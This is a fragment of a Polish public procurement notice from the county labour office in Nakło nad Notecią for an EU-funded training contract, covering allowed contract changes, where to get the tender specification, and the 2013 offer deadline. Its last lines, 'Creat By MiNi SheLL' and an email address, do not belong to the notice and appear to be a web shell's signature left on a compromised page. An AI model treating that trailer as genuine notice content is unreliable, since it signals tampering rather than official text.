<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w przypadku: a. zmiany ilości uczestników szkolenia, b. zmiany terminu realizacji szkolenia, c. zmiany osób, które będą uczestniczyć w wykonaniu zamówienia. Zamawiający zastrzega sobie jednak, że w przypadku zmiany kadry dydaktycznej Wykonawca jest zobowiązany zapewnić nową osobę posiadającą minimalne kwalifikacje, wykształcenie i doświadczenie do osoby wykazanej w ofercie. d. zmiany miejsca odbywania szkolenia. Dokonana zmiana nie może prowadzić do obniżenia wymagań jakie Zamawiający określił w SIWZ. e. zmiany dokumentacji szkolenia. f. zmiany źródła finansowania osób skierowanych na szkolenie. Warunkiem wprowadzenia zmian w umowie jest pisemne zwrócenie się o wyrażenie zgody jednej ze stron na dokonanie zmiany w umowie z podaniem uzasadnienia faktycznego oraz wyrażenie zgody drugiej strony. Wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności takich zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupnaklo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Nakle nad Notecią 
ul. Dąbrowskiego 46 
89-100 Nakło nad Notecią 
III piętro, pok. 312a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2013 godzina 11:00, miejsce: Powiatowy Urząd Pracy w Nakle nad Notecią 
ul. Dąbrowskiego 46 
89-100 Nakło nad Notecią 
III piętro, pok. 308.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Źródłem finansowania szkolenia jest Europejski Fundusz Społeczny w ramach projektu Aktywność - Twój sposób na sukces w ramach PO KL Poddziałania 6.1.3.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com